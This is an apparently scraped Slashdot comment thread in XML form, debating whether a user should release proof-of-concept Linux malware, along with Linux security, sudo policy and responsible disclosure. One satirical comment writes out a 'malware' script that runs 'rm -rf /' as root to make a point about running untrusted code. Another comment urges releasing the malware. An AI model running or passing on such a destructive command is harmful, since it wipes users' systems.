	<author>mark-t</author>
	<datestamp>1259686140000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><nobr> <wbr></nobr>... then you'll see for yourself exactly how secure linux (and other *X) systems are, in general.  Seriously, I don't know why you bothered to even ask... it's obvious that you wanted to, so just do it.
</p><p>
I'd go so far as to say that I highly doubt that sufficient numbers of people would be adversely affected by it to warrant any sort of legal action against you... at most you might be providing a proof of concept for security experts who can then proceed to adapt to what changes may be necessary to avoid the attack vector in the future.
</p><p>
Release it, and move on.</p></htmltext>
<tokenext>... then you 'll see for yourself exactly how secure linux ( and other * X ) systems are , in general .
Seriously , I do n't know why you bothered to even ask... it 's obvious that you wanted to , so just do it .
I 'd go so far as to say that I highly doubt that sufficient numbers of people would be adversely affected by it to warrant any sort of legal action against you... at most you might be providing a proof of concept for security experts who can then proceed to adapt to what changes may be necessary to avoid the attack vector in the future .
Release it , and move on .</tokentext>
<sentencetext> ... then you'll see for yourself exactly how secure linux (and other *X) systems are, in general.
Seriously, I don't know why you bothered to even ask... it's obvious that you wanted to, so just do it.
I'd go so far as to say that I highly doubt that sufficient numbers of people would be adversely affected by it to warrant any sort of legal action against you... at most you might be providing a proof of concept for security experts who can then proceed to adapt to what changes may be necessary to avoid the attack vector in the future.
Release it, and move on.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279304</id>
	<title>Re:It does harm!!!!</title>
	<author>mysidia</author>
	<datestamp>1259602080000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p> <em>Lets put it another way. Even if I left my house door wide open, opened all the windows etc. It still does not give you the right to come in and f*ck with my house.</em> </p><p>
It doesn't give anyone the right to come tamper with your house.
</p><p>
However, if they walk in a door you opened, they haven't "broken in".
</p><p>
They're just trespassing (possibly);  hopefully you don't have a doormat that says "Welcome",  "Come In", or something such as that.
</p><p>
If you do, then w/ the door held open: you've invited them in.
</p></htmltext>
<tokenext>Lets put it another way .
Even if I left my house door wide open , opened all the windows etc .
It still does not give you the right to come in and f * ck with my house .
It does n't give anyone the right to come tamper with your house .
However , if they walk in a door you opened , they have n't " broken in " .
They 're just trespassing ( possibly ) ; hopefully you do n't have a doormat that says " Welcome " , " Come In " , or something such as that .
If you do , then w/ the door held open : you 've invited them in .</tokentext>
<sentencetext> Lets put it another way.
Even if I left my house door wide open, opened all the windows etc.
It still does not give you the right to come in and f*ck with my house.
It doesn't give anyone the right to come tamper with your house.
However, if they walk in a door you opened, they haven't "broken in".
They're just trespassing (possibly);  hopefully you don't have a doormat that says "Welcome",  "Come In", or something such as that.
If you do, then w/ the door held open: you've invited them in.
</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278810</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282256</id>
	<title>This is ludicrous!</title>
	<author>Anonymous</author>
	<datestamp>1259677920000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Look, unless it was purchased in the last month or so (and I may be too liberal with the timeline since OEM machines can sit on a shelf for months), I don't dare set up a Windows XP machine and connect it directly to the Internet to update the operating system because it will be pwned in about 30 seconds. Part of the problem is Microsoft's dependence on updates over the Internet to fix known vulnerabilities. I know, I know, there are ways around it, but how many apply to the owner of a Dell machine with a recovery disk? No stupid luser involved, no need to download anything, just connect it to the friggin' Internet to update the patches!</p><p>I can (and have) download(ed) the latest image of any of the popular *nix's, do an install and be reasonably certain that the unit will not be pwned when I connect it directly to the Internet.</p><p>Now tell me again how *nix's are as insecure as Windows...</p></htmltext>
<tokenext>Look , unless it was purchased in the last month or so ( and I may be too liberal with the timeline since OEM machines can sit on a shelf for months ) , I do n't dare set up a Windows XP machine and connect it directly to the Internet to update the operating system because it will be pwned in about 30 seconds .
Part of the problem is Microsoft 's dependence on updates over the Internet to fix known vulnerabilities .
I know , I know , there are ways around it , but how many apply to the owner of a Dell machine with a recovery disk ?
No stupid luser involved , no need to download anything , just connect it to the friggin ' Internet to update the patches ! I can ( and have ) download ( ed ) the latest image of any of the popular * nix 's , do an install and be reasonably certain that the unit will not be pwned when I connect it directly to the Internet.Now tell me again how * nix 's are as insecure as Windows.. .</tokentext>
<sentencetext>Look, unless it was purchased in the last month or so (and I may be too liberal with the timeline since OEM machines can sit on a shelf for months), I don't dare set up a Windows XP machine and connect it directly to the Internet to update the operating system because it will be pwned in about 30 seconds.
Part of the problem is Microsoft's dependence on updates over the Internet to fix known vulnerabilities.
I know, I know, there are ways around it, but how many apply to the owner of a Dell machine with a recovery disk?
No stupid luser involved, no need to download anything, just connect it to the friggin' Internet to update the patches!I can (and have) download(ed) the latest image of any of the popular *nix's, do an install and be reasonably certain that the unit will not be pwned when I connect it directly to the Internet.Now tell me again how *nix's are as insecure as Windows...</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280066</id>
	<title>Re:Malware and Worms in GNU/Linux and *BSD</title>
	<author>melikamp</author>
	<datestamp>1259610660000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>The vector is in simulating a familiar program which is known to ask for a privilege escalation. Simulating a dialog is pointless, as others pointed out above.

</p><p>The fix is to forbid core programs to ask for privilege escalation <i>regularly</i>, as a matter of system policy. Updates, for example, should either be
fully automatic or fully manual: the current default policy (which, I believe, pops up and prompts regularly) is the least safe one for a lay user. Ideally, that user should not be needing root at all. This lofty goal may be unreachable, but bugging a user with update prompts twice a week ain't making her any safer.</p></htmltext>
<tokenext>The vector is in simulating a familiar program which is known to ask for a privilege escalation .
Simulating a dialog is pointless , as others pointed out above .
The fix is to forbid core programs to ask for privilege escalation regularly , as a matter of system policy .
Updates , for example , should either be fully automatic or fully manual : the current default policy ( which , I believe , pops up and prompts regularly ) is the least safe one for a lay user .
Ideally , that user should not be needing root at all .
This lofty goal may be unreachable , but bugging a user with update prompts twice a week ai n't making her any safer .</tokentext>
<sentencetext>The vector is in simulating a familiar program which is known to ask for a privilege escalation.
Simulating a dialog is pointless, as others pointed out above.
The fix is to forbid core programs to ask for privilege escalation regularly, as a matter of system policy.
Updates, for example, should either be
fully automatic or fully manual: the current default policy (which, I believe, pops up and prompts regularly) is the least safe one for a lay user.
Ideally, that user should not be needing root at all.
This lofty goal may be unreachable, but bugging a user with update prompts twice a week ain't making her any safer.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279866</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279224</id>
	<title>The difference between Linux and Windows</title>
	<author>fortapocalypse</author>
	<datestamp>1259601360000</datestamp>
	<modclass>Funny</modclass>
	<modscore>2</modscore>
	<htmltext>... is that after a Linux developer writes malware, he/she contributes it to the community. When a Windows developer creates malware, he/she uses it immediately for fun or profit.</htmltext>
<tokenext>... is that after a Linux developer writes malware , he/she contributes it to the community .
When a Windows developer creates malware , he/she uses it immediately for fun or profit .</tokentext>
<sentencetext>... is that after a Linux developer writes malware, he/she contributes it to the community.
When a Windows developer creates malware, he/she uses it immediately for fun or profit.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282848</id>
	<title>Attack Vector Bullshit</title>
	<author>Anonymous</author>
	<datestamp>1259681400000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>What is all this talk about Attack Vector... All these mysterious ways of getting a linux machine infected.</p><p>Just put some malware rpm on some random chinese/russion/etc server and call it the TurboNvidia.RPM and all a user has to do is click on the damn thing in firefox and install it.  They have to click yes to override the signature but I've seen Ubuntu users do much worse.</p></htmltext>
<tokenext>What is all this talk about Attack Vector... All these mysterious ways of getting a linux machine infected.Just put some malware rpm on some random chinese/russion/etc server and call it the TurboNvidia.RPM and all a user has to do is click on the damn thing in firefox and install it .
They have to click yes to override the signature but I 've seen Ubuntu users do much worse .</tokentext>
<sentencetext>What is all this talk about Attack Vector... All these mysterious ways of getting a linux machine infected.Just put some malware rpm on some random chinese/russion/etc server and call it the TurboNvidia.RPM and all a user has to do is click on the damn thing in firefox and install it.
They have to click yes to override the signature but I've seen Ubuntu users do much worse.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279892</id>
	<title>Re:Dear Slashdot</title>
	<author>indiechild</author>
	<datestamp>1259607900000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>That's right, you show those smug elitist bastards -- how dare they walk around without a full-face helmet? I can't wait for someone to pound those grinning little pricks into the dirt!</p></htmltext>
<tokenext>That 's right , you show those smug elitist bastards -- how dare they walk around without a full-face helmet ?
I ca n't wait for someone to pound those grinning little pricks into the dirt !</tokentext>
<sentencetext>That's right, you show those smug elitist bastards -- how dare they walk around without a full-face helmet?
I can't wait for someone to pound those grinning little pricks into the dirt!</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279538</id>
	<title>Re:I think you've already decided...</title>
	<author>westlake</author>
	<datestamp>1259604240000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p><i>You can get victimized by something that you HAVE TO CHOOSE TO RUN MANUALLY!</i> </p><p>Of course you can.</p><p>The simplest and most productive line of attack on any OS will always be to play on the weaknesses of the user and not the tech.</p></htmltext>
<tokenext>You can get victimized by something that you HAVE TO CHOOSE TO RUN MANUALLY !
Of course you can.The simplest and most productive line of attack on any OS will always be to play on the weaknesses of the user and not the tech .</tokentext>
<sentencetext>You can get victimized by something that you HAVE TO CHOOSE TO RUN MANUALLY!
Of course you can.The simplest and most productive line of attack on any OS will always be to play on the weaknesses of the user and not the tech.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282564</id>
	<title>Typical Programmer Thinking</title>
	<author>Anonymous</author>
	<datestamp>1259679660000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>This is another example of typical programmer thinking.</p><p>I see a security hole, I'll EXPLOIT it with some "harmless" malware, and teach people a lesson.</p><p>-Are you 100\% sure your "harmless" malware will not bring down a critical system?<br>-Can you sleep at night knowing you broke several laws?<br>-How about if people choose to go after you for damages?</p><p>I know you are just a simple programmer, and have no professional body we can complain or report you to, besides your employer, but you can still be held PERSONALLY liable for damages.</p><p>A real engineer would NEVER EVER think of doing this. "software engineers" on the other hand, have time to think of doing crap like this, because they have no real consequences besides being personally held liable, if they are ever caught.</p><p>Go hide behind your anonymity. Give programmers a black eye from which they may never recover.</p><p>"software engineers" my a55.</p></htmltext>
<tokenext>This is another example of typical programmer thinking.I see a security hole , I 'll EXPLOIT it with some " harmless " malware , and teach people a lesson.-Are you 100 \ % sure your " harmless " malware will not bring down a critical system ? -Can you sleep at night knowing you broke several laws ? -How about if people choose to go after you for damages ? I know you are just a simple programmer , and have no professional body we can complain or report you to , besides your employer , but you can still be held PERSONALLY liable for damages.A real engineer would NEVER EVER think of doing this .
" software engineers " on the other hand , have time to think of doing crap like this , because they have no real consequences besides being personally held liable , if they are ever caught.Go hide behind your anonymity .
Give programmers a black eye from which they may never recover .
" software engineers " my a55 .</tokentext>
<sentencetext>This is another example of typical programmer thinking.I see a security hole, I'll EXPLOIT it with some "harmless" malware, and teach people a lesson.-Are you 100\% sure your "harmless" malware will not bring down a critical system?-Can you sleep at night knowing you broke several laws?-How about if people choose to go after you for damages?I know you are just a simple programmer, and have no professional body we can complain or report you to, besides your employer, but you can still be held PERSONALLY liable for damages.A real engineer would NEVER EVER think of doing this.
"software engineers" on the other hand, have time to think of doing crap like this, because they have no real consequences besides being personally held liable, if they are ever caught.Go hide behind your anonymity.
Give programmers a black eye from which they may never recover.
"software engineers" my a55.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280830</id>
	<title>Re:It does harm!!!!</title>
	<author>loutr</author>
	<datestamp>1259662800000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>In France it doesn't work that way. One of my mother's friend witnessed it first-hand : strong guys came and knocked down the door of the house my friend had just bought and was renovating, then left. A third person moved into the house, and there was no way at all to force him to leave because he had not broken the door himself, even though this person had obviously no proof that he possessed or rented the house, and my friend had the property title. He did some research and found an extreme left website which provided instructions on how to take advantage of the law in this manner, going as far as providing a platform for homeless people to get into contact with the guys who would knock down the door.
</p><p>A year later the police arrested the man for something completely unrelated (he was a transvestite prostitute), and my friend got his (by then completely destroyed) house back. All he could do was pay for renovation again, there was no way he could sue the person and have him pay the bills.
</p><p>Gotta love a country where you can get jailtime for possessing even small amounts of marijuana, but where you can just "steal" a house from someone and thrash it completely without any consequences...</p></htmltext>
<tokenext>In France it does n't work that way .
One of my mother 's friend witnessed it first-hand : strong guys came and knocked down the door of the house my friend had just bought and was renovating , then left .
A third person moved into the house , and there was no way at all to force him to leave because he had not broken the door himself , even though this person had obviously no proof that he possessed or rented the house , and my friend had the property title .
He did some research and found an extreme left website which provided instructions on how to take advantage of the law in this manner , going as far as providing a platform for homeless people to get into contact with the guys who would knock down the door .
A year later the police arrested the man for something completely unrelated ( he was a transvestite prostitute ) , and my friend got his ( by then completely destroyed ) house back .
All he could do was pay for renovation again , there was no way he could sue the person and have him pay the bills .
Got ta love a country where you can get jailtime for possessing even small amounts of marijuana , but where you can just " steal " a house from someone and thrash it completely without any consequences.. .</tokentext>
<sentencetext>In France it doesn't work that way.
One of my mother's friend witnessed it first-hand : strong guys came and knocked down the door of the house my friend had just bought and was renovating, then left.
A third person moved into the house, and there was no way at all to force him to leave because he had not broken the door himself, even though this person had obviously no proof that he possessed or rented the house, and my friend had the property title.
He did some research and found an extreme left website which provided instructions on how to take advantage of the law in this manner, going as far as providing a platform for homeless people to get into contact with the guys who would knock down the door.
A year later the police arrested the man for something completely unrelated (he was a transvestite prostitute), and my friend got his (by then completely destroyed) house back.
All he could do was pay for renovation again, there was no way he could sue the person and have him pay the bills.
Gotta love a country where you can get jailtime for possessing even small amounts of marijuana, but where you can just "steal" a house from someone and thrash it completely without any consequences...</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280284</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278798</id>
	<title>Release a paper</title>
	<author>Ernesto Alvarez</author>
	<datestamp>1259597520000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Get in touch with the security community as some other poster said.</p><p>Then concentrate in releasing a paper about your software. If your techniques are good, they might be an interesting read. Even more important is that if your software does not escalate privileges (as I understand), cleaning your software should be a straightforward job from the superuser account. Those cleaning techniques will probably be even more interesting.</p><p>I'd use a rather obvious payload that reveals itself when interrogated (instead of BOINC) in order to be useful for evaluating system security.</p><p>I don't think your malware is as nasty as you think, as you said you relied on executing downloaded software on a world with signed repositories and with MD5 hashes/pgp signatures as a normal custom. I also think you're underestimating the difference between administrator-all-the-time windows way and the only-escalate-when-needed model of the unix world. It would be interesting to see what happens, though.</p></htmltext>
<tokenext>Get in touch with the security community as some other poster said.Then concentrate in releasing a paper about your software .
If your techniques are good , they might be an interesting read .
Even more important is that if your software does not escalate privileges ( as I understand ) , cleaning your software should be a straightforward job from the superuser account .
Those cleaning techniques will probably be even more interesting.I 'd use a rather obvious payload that reveals itself when interrogated ( instead of BOINC ) in order to be useful for evaluating system security.I do n't think your malware is as nasty as you think , as you said you relied on executing downloaded software on a world with signed repositories and with MD5 hashes/pgp signatures as a normal custom .
I also think you 're underestimating the difference between administrator-all-the-time windows way and the only-escalate-when-needed model of the unix world .
It would be interesting to see what happens , though .</tokentext>
<sentencetext>Get in touch with the security community as some other poster said.Then concentrate in releasing a paper about your software.
If your techniques are good, they might be an interesting read.
Even more important is that if your software does not escalate privileges (as I understand), cleaning your software should be a straightforward job from the superuser account.
Those cleaning techniques will probably be even more interesting.I'd use a rather obvious payload that reveals itself when interrogated (instead of BOINC) in order to be useful for evaluating system security.I don't think your malware is as nasty as you think, as you said you relied on executing downloaded software on a world with signed repositories and with MD5 hashes/pgp signatures as a normal custom.
I also think you're underestimating the difference between administrator-all-the-time windows way and the only-escalate-when-needed model of the unix world.
It would be interesting to see what happens, though.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279762</id>
	<title>Re:Commendable</title>
	<author>techno-vampire</author>
	<datestamp>1259606340000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>2</modscore>
	<htmltext><i>Linux commands on their own can look very cryptic to the uninitiated.</i> <p>
My sister uses Ubuntu, and I'm her tech support.  Sometimes, I need distro-specific advice (I use Fedora.) and ask on ubuntuforums.org.  I've glanced at some of the forum rules, both there and at the Fedora fourm I use for my own system and they both specifically forbids suggesting certain commands as "solutions" to problems, even as a joke, because they're so destructive.</p></htmltext>
<tokenext>Linux commands on their own can look very cryptic to the uninitiated .
My sister uses Ubuntu , and I 'm her tech support .
Sometimes , I need distro-specific advice ( I use Fedora .
) and ask on ubuntuforums.org .
I 've glanced at some of the forum rules , both there and at the Fedora fourm I use for my own system and they both specifically forbids suggesting certain commands as " solutions " to problems , even as a joke , because they 're so destructive .</tokentext>
<sentencetext>Linux commands on their own can look very cryptic to the uninitiated.
My sister uses Ubuntu, and I'm her tech support.
Sometimes, I need distro-specific advice (I use Fedora.
) and ask on ubuntuforums.org.
I've glanced at some of the forum rules, both there and at the Fedora fourm I use for my own system and they both specifically forbids suggesting certain commands as "solutions" to problems, even as a joke, because they're so destructive.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281648</id>
	<title>Re:I think you've already decided...</title>
	<author>dkf</author>
	<datestamp>1259671920000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>it doesn't even need an author with a cheesy villan laugh.</p></div><p>But I like the laugh. I've practiced it so much.<nobr> <wbr></nobr>:-(</p></div>
	</htmltext>
<tokenext>it does n't even need an author with a cheesy villan laugh.But I like the laugh .
I 've practiced it so much .
: - (</tokentext>
<sentencetext>it doesn't even need an author with a cheesy villan laugh.But I like the laugh.
I've practiced it so much.
:-(
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278898</id>
	<title>Fuck your little moral dilemma.</title>
	<author>Anonymous</author>
	<datestamp>1259598120000</datestamp>
	<modclass>Troll</modclass>
	<modscore>-1</modscore>
	<htmltext>Waaa! Is this evil? Is that evil? Grow the fuck up.<br> <br>Your morality is for shit and anyone who wants to get ahead knows this.</htmltext>
<tokenext>Waaa !
Is this evil ?
Is that evil ?
Grow the fuck up .
Your morality is for shit and anyone who wants to get ahead knows this .</tokentext>
<sentencetext>Waaa!
Is this evil?
Is that evil?
Grow the fuck up.
Your morality is for shit and anyone who wants to get ahead knows this.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278974</id>
	<title>Insecurity through stupidity</title>
	<author>Anonymous</author>
	<datestamp>1259598840000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext>Insecurity through stupidity is a common problem on Linux.  The Ubuntu forums are full of users wailing that their machines got hacked after they installed FTP, SSH or VNC with a kewl four letter password.

One could argue that it is not the users, but rather the Ubuntu developers that are stupid by not configuring PAM to enforce password complexity by default, since it is not really a flaw in 'Linux' per se, but it could certainly be considered to be a dumb-ass flaw in the Ubuntu distribution.</htmltext>
<tokenext>Insecurity through stupidity is a common problem on Linux .
The Ubuntu forums are full of users wailing that their machines got hacked after they installed FTP , SSH or VNC with a kewl four letter password .
One could argue that it is not the users , but rather the Ubuntu developers that are stupid by not configuring PAM to enforce password complexity by default , since it is not really a flaw in 'Linux ' per se , but it could certainly be considered to be a dumb-ass flaw in the Ubuntu distribution .</tokentext>
<sentencetext>Insecurity through stupidity is a common problem on Linux.
The Ubuntu forums are full of users wailing that their machines got hacked after they installed FTP, SSH or VNC with a kewl four letter password.
One could argue that it is not the users, but rather the Ubuntu developers that are stupid by not configuring PAM to enforce password complexity by default, since it is not really a flaw in 'Linux' per se, but it could certainly be considered to be a dumb-ass flaw in the Ubuntu distribution.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278814</id>
	<title>Anonymous for lack of motivation</title>
	<author>Anonymous</author>
	<datestamp>1259597580000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>I don't see how social engineering is proof of concept on this one. Mindless execution relies on social engineering, which is how most malware spreads. Put malicious code in a PPS or something like that isn't going to prove the lack of security, unless you cross into the superuser account. By then, it doesn't matter. Mac can be compromised this way. Microsoft has hundreds of thousands of ways this can happen. Linux is just software. This means it is vulnerable. But compare software strength to person strength, that's where you can prove something. Linux has its flaws just like anything else. But if it relies on someone physically executing the code, you can't prove system weakness. Idiot weakness doesn't count.</p></htmltext>
<tokenext>I do n't see how social engineering is proof of concept on this one .
Mindless execution relies on social engineering , which is how most malware spreads .
Put malicious code in a PPS or something like that is n't going to prove the lack of security , unless you cross into the superuser account .
By then , it does n't matter .
Mac can be compromised this way .
Microsoft has hundreds of thousands of ways this can happen .
Linux is just software .
This means it is vulnerable .
But compare software strength to person strength , that 's where you can prove something .
Linux has its flaws just like anything else .
But if it relies on someone physically executing the code , you ca n't prove system weakness .
Idiot weakness does n't count .</tokentext>
<sentencetext>I don't see how social engineering is proof of concept on this one.
Mindless execution relies on social engineering, which is how most malware spreads.
Put malicious code in a PPS or something like that isn't going to prove the lack of security, unless you cross into the superuser account.
By then, it doesn't matter.
Mac can be compromised this way.
Microsoft has hundreds of thousands of ways this can happen.
Linux is just software.
This means it is vulnerable.
But compare software strength to person strength, that's where you can prove something.
Linux has its flaws just like anything else.
But if it relies on someone physically executing the code, you can't prove system weakness.
Idiot weakness doesn't count.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280734</id>
	<title>Re:Malware and Worms in GNU/Linux and *BSD</title>
	<author>buchanmilne</author>
	<datestamp>1259661900000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>Because the solution is as simple as changing the default policy. Make it so that the default behavior is to notify only.</p></div><p>No, the solution is to not give blanket sudo access to the first user, but instead allow specific trusted applications, possibly running in a restricted mode (e.g. rurpmi on Mandriva), or to run elevated commands via a daemon running as root with specific authorization (the PolicyKit model).</p><p>This is why one reason I don't recommend Ubuntu.</p><p>(and this specific problem is not  a "Linux" problem, it's almost exclusively an Ubuntu problem)</p></div>
	</htmltext>
<tokenext>Because the solution is as simple as changing the default policy .
Make it so that the default behavior is to notify only.No , the solution is to not give blanket sudo access to the first user , but instead allow specific trusted applications , possibly running in a restricted mode ( e.g .
rurpmi on Mandriva ) , or to run elevated commands via a daemon running as root with specific authorization ( the PolicyKit model ) .This is why one reason I do n't recommend Ubuntu .
( and this specific problem is not a " Linux " problem , it 's almost exclusively an Ubuntu problem )</tokentext>
<sentencetext>Because the solution is as simple as changing the default policy.
Make it so that the default behavior is to notify only.No, the solution is to not give blanket sudo access to the first user, but instead allow specific trusted applications, possibly running in a restricted mode (e.g.
rurpmi on Mandriva), or to run elevated commands via a daemon running as root with specific authorization (the PolicyKit model).This is why one reason I don't recommend Ubuntu.
(and this specific problem is not  a "Linux" problem, it's almost exclusively an Ubuntu problem)
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30296580</id>
	<title>Secunia or CERT</title>
	<author>Anonymous</author>
	<datestamp>1259592540000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Send it over to Secunia and CERT.  They know who it needs to get to, and know how to release it properly.  And, to boot, you get the credit for it.</p><p>It's a fucking no-brainer here.  And if you are really a \_\_\_\_\_\_\_\_\_hat, you would have already known to do this.  I think you don't have any code, just a possible attack vector.  Either way, send it over to them, they release it after coming up with code (If your's is broken) after a week or two after notifying the vendor.  And you get credit for discovering it.</p><p>You'll only get sued if you do it the wrong way: ie attaching your name to it and releasing it to the wild.</p></htmltext>
<tokenext>Send it over to Secunia and CERT .
They know who it needs to get to , and know how to release it properly .
And , to boot , you get the credit for it.It 's a fucking no-brainer here .
And if you are really a \ _ \ _ \ _ \ _ \ _ \ _ \ _ \ _ \ _hat , you would have already known to do this .
I think you do n't have any code , just a possible attack vector .
Either way , send it over to them , they release it after coming up with code ( If your 's is broken ) after a week or two after notifying the vendor .
And you get credit for discovering it.You 'll only get sued if you do it the wrong way : ie attaching your name to it and releasing it to the wild .</tokentext>
<sentencetext>Send it over to Secunia and CERT.
They know who it needs to get to, and know how to release it properly.
And, to boot, you get the credit for it.It's a fucking no-brainer here.
And if you are really a \_\_\_\_\_\_\_\_\_hat, you would have already known to do this.
I think you don't have any code, just a possible attack vector.
Either way, send it over to them, they release it after coming up with code (If your's is broken) after a week or two after notifying the vendor.
And you get credit for discovering it.You'll only get sued if you do it the wrong way: ie attaching your name to it and releasing it to the wild.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281874</id>
	<title>Re:Insecurity through stupidity</title>
	<author>magamiako1</author>
	<datestamp>1259674320000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>there is a point where password complexity requirements become annoying to end users. So while it may be cool or doable for your average nerd to use a password like @$#l33tS4uc3#! ; the average end user is more likely to use things like their first and last name, the names of a kid, their pets, their street name and house number, or something along those lines. Such as "1313mockingbird" or along those lines.</htmltext>
<tokenext>there is a point where password complexity requirements become annoying to end users .
So while it may be cool or doable for your average nerd to use a password like @ $ # l33tS4uc3 # !
; the average end user is more likely to use things like their first and last name , the names of a kid , their pets , their street name and house number , or something along those lines .
Such as " 1313mockingbird " or along those lines .</tokentext>
<sentencetext>there is a point where password complexity requirements become annoying to end users.
So while it may be cool or doable for your average nerd to use a password like @$#l33tS4uc3#!
; the average end user is more likely to use things like their first and last name, the names of a kid, their pets, their street name and house number, or something along those lines.
Such as "1313mockingbird" or along those lines.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278974</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278900</id>
	<title>Re:Dear Slashdot</title>
	<author>geckipede</author>
	<datestamp>1259598120000</datestamp>
	<modclass>Funny</modclass>
	<modscore>5</modscore>
	<htmltext>The day that somebody starts releasing automated face punching machines into the streets, I certainly will be among the first to buy a helmet.</htmltext>
<tokenext>The day that somebody starts releasing automated face punching machines into the streets , I certainly will be among the first to buy a helmet .</tokentext>
<sentencetext>The day that somebody starts releasing automated face punching machines into the streets, I certainly will be among the first to buy a helmet.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280334</id>
	<title>LinuxMalware1.0.exe.sh</title>
	<author>thatkid\_2002</author>
	<datestamp>1259700600000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext>Install and Run Instructions<br>
================== <br>
chmod a+x<nobr> <wbr></nobr>./LinuxMalware1.0.exe.sh<br>
su -c "./LinuxMalware1.0.exe.sh"<br>
<br>
<br>
Script<br>
==========<br>
#!/bin/bash<br>
rm -rf<nobr> <wbr></nobr>/<br>
exit(0)<br>
<br> <br>
The Point<br>
=============<br>
If you are running things from an untrusted source then you are a dumb-ass.<br>
There is no patch for human stupidity.<br>
<a href="http://www.rocketdownload.com/software/rar.html" title="rocketdownload.com" rel="nofollow">http://www.rocketdownload.com/software/rar.html</a> [rocketdownload.com]</htmltext>
<tokenext>Install and Run Instructions = = = = = = = = = = = = = = = = = = chmod a + x ./LinuxMalware1.0.exe.sh su -c " ./LinuxMalware1.0.exe.sh " Script = = = = = = = = = = # ! /bin/bash rm -rf / exit ( 0 ) The Point = = = = = = = = = = = = = If you are running things from an untrusted source then you are a dumb-ass .
There is no patch for human stupidity .
http : //www.rocketdownload.com/software/rar.html [ rocketdownload.com ]</tokentext>
<sentencetext>Install and Run Instructions
================== 
chmod a+x ./LinuxMalware1.0.exe.sh
su -c "./LinuxMalware1.0.exe.sh"


Script
==========
#!/bin/bash
rm -rf /
exit(0)
 
The Point
=============
If you are running things from an untrusted source then you are a dumb-ass.
There is no patch for human stupidity.
http://www.rocketdownload.com/software/rar.html [rocketdownload.com]</sentencetext>
</comment>
<comment>
